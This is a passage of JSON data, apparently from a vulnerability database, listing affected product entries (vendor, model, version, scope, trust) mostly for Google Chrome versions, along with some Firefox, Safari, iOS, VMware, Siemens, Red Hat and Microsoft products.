      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.44"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.37"
      },
      {
        "_id": null,
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.3"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.473.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.441.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1012.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1040"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1037.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.115"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "32.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.104"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.61"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.53"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0.3"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.426.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.752.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.2.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.43"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.33"
      },
      {
        "_id": null,
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5x"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.834.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.327.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1654.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.94"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.112"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.49"
      },
      {
        "_id": null,
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.401.1"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.112"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.22"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.493.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.216"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.103"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "64.0.3282.144"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "59.0.3071.92"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.327"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.186"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.956.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1662.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.49"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.9"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1183.0"
      },
      {
        "_id": null,
        "model": "sinumerik tcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "30.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.92"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.217"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.6.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.2491036"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.108"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.7"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "45.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.522.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "49.0.2623.87"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.23"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.5"
      },
      {
        "_id": null,
        "model": "sinumerik d sl ncu720.3b",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "840"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.94"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1305.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.12"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.79"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "61.0.3163.100"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.622.1"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.91"
      },
      {
        "_id": null,
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.159"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1062.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.2.152.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.556.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.53"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.450.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.119"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.161"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.772.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.322.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.125"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1059.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.398.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.32"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.404.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.140"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.531.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "47.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.82"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.53"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.321"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.94"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.45"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.870.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1006.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.91"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1653.1"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "28.0"
      },
      {
        "_id": null,
        "model": "pyxis anesthesia es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.66"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.204"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.58"
      },
      {
        "_id": null,
        "model": "enterprise linux for power little endian extended update supp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.551.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1083.0"
      },
      {
        "_id": null,
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "8.10"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.152"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "62.0.3202.89"
      },
      {
        "_id": null,
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.301"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.335"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.695.0"
      },
      {
        "_id": null,
        "model": "windows for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "8.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.39"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.2"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.1.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1021"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1688.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.325"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.24"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.5"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.732.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.50"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.58"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1290.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.26"
      },
      {
        "_id": null,
        "model": "vcloud usage meter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.712.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "49.0.2566.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1286.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.152"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.558.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.98"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.2"
      },
      {
        "_id": null,
        "model": "simatic ipc827c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.822.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.120"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.665.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.629.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "49"
      },
      {
        "_id": null,
        "model": "sql server r2 for 32-bit systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "200830"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1012.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.339"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.109"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.335.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.15"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "31.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.763.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "15.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.112"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.947.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.55"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1276.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.168"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.878.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "19.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.42"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "57.0.4"
      },
      {
        "_id": null,
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.542.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1663.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.48"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.62"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.837.0"
